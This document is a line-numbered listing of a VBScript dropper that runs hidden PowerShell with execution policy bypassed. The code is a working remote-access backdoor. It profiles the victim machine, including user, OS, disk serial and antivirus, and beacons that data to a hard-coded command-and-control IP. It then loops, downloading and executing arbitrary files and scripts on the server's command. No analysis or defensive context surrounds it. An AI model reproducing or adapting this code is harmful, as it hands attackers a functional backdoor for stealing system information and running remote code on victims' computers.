set O = CreateObject("Wscript.Shell")O.Run "powershell -ExecutionPolicy Bypa

1. set O = CreateObject("Wscript.Shell")
2.  
3. O.Run "powershell -ExecutionPolicy Bypass -Command " & chrw(34) & "$spl = '\';
4.  
5. $vn = 'Guest';
6. function info {
7. try {
8. $mch = [environment]::Machinename;$usr = [environment]::username;
9. $HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;
10. $HWD = $HWD[0];
11. $wi = (Get-WmiObject Win32_OperatingSystem).Caption;
12. $wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');
13. $av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;
14. $e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';
15. if (test-path $e) {
16. $nt = 'YES'
17. } else {
18. $nt= 'NO'
19. };
20. if (test-path 'HKCU:\vdw0rm') {
21. $usb = 'TRUE'
22. } else {
23. $usb = 'FALSE'
24. };
25. $u = $vn + '_' + $HWD + $spl + $mch + $spl + $usr + $spl + $wi + $spl + $av + $spl + $spl + $nt + $spl + $usb + $spl;
26. return $u
27. } catch {
28. Start-Sleep -s 3
29. }
30. };
31.  
32. function post ($cmdv, $v) {
33. try {
34. $enc = [system.Text.Encoding]::UTF8;
35. $Req = [System.Net.HttpWebRequest]::Create('http://103.1.184.108:2213/' + $cmdv);
36. $Req.Method = 'POST';
37. $req.UserAgent = info;
38. [System.IO.Stream]$stm;
39. $stm = $Req.GetRequestStream();
40. $Y = $enc.GetBytes([byte][char]$V);
41. $Stm.Write($Y, 0, $Y.Length);
42. $stm.close();
43. $resp = $req.GetResponse().GetResponseStream();
44. $sr = New-Object System.IO.StreamReader($resp);
45. $v=$sr.ReadToEnd();
46. $sr.close();
47. return [string]$v
48. } catch {
49. Start-Sleep -s 3
50. }
51. };
52.  
53. $infinite =$true;
54. while($infinite) {
55. $cmd = @(post('Vre','').ToString());
56. $T,$T1,$T2 = $cmd[1] -csplit 'ameer',3;
57. if ($T -eq 'exc') {
58. try {(New-Object System.Net.WebClient).DownloadFile($T1, $env:temp + '\' + $T2);
59. [Diagnostics.Process]::Start($env:temp + '\' + $T2)
60. } catch {
61. Start-Sleep -s 3
62. }
63. };
64. if ($T -eq 'Sc') {
65. Try {
66. [IO.File]::AppendAllText($env:temp + '\' + $T2,$T1);
67. [Diagnostics.Process]::Start($env:temp + '\' + $T2)
68. } Catch {
69. Start-Sleep -s 3
70. }
71. };
72. if ($T -eq 'Rn') {
73. try {
74. $Gb = [system.Text.Encoding]::Default;[IO.File]::WriteAllBytes($env:temp + '\' + $T2,$Gb.GetBytes($T1));
75. [Diagnostics.Process]::Start($env:temp + '\' + $T2)
76. } catch {
77. Start-Sleep -s 3
78. }
79. };
80. if ($T -eq 'Up') {
81. try {
82. $Gb = [system.Text.Encoding]::Default;[IO.File]::WriteAllBytes($env:temp + '\' + $T2,$Gb.GetBytes($T1));
83. [Diagnostics.Process]::Start($env:temp + '\' + $T2);
84. exit
85. } catch {
86. Start-Sleep -s 3
87. }
88. };
89. if ($T -eq 'Cl') {
90. exit
91. };
92. $T = $null;
93. $T1= $null;
94. $T2 = $null;
95. Start-Sleep -s 7
96. }"
97.  
98. & chrw(34),0,false